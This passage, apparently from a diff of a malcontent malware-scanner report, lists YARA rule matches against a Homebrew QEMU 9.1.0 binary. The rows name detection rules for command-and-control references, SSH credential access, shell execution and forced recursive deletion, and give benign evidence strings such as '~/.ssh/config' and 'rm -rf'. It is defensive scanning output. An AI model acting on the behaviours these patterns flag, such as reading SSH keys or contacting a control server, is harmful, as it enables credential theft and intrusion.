[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | -| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | +| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | +| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | +| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | +| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | +| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | +| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | +| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
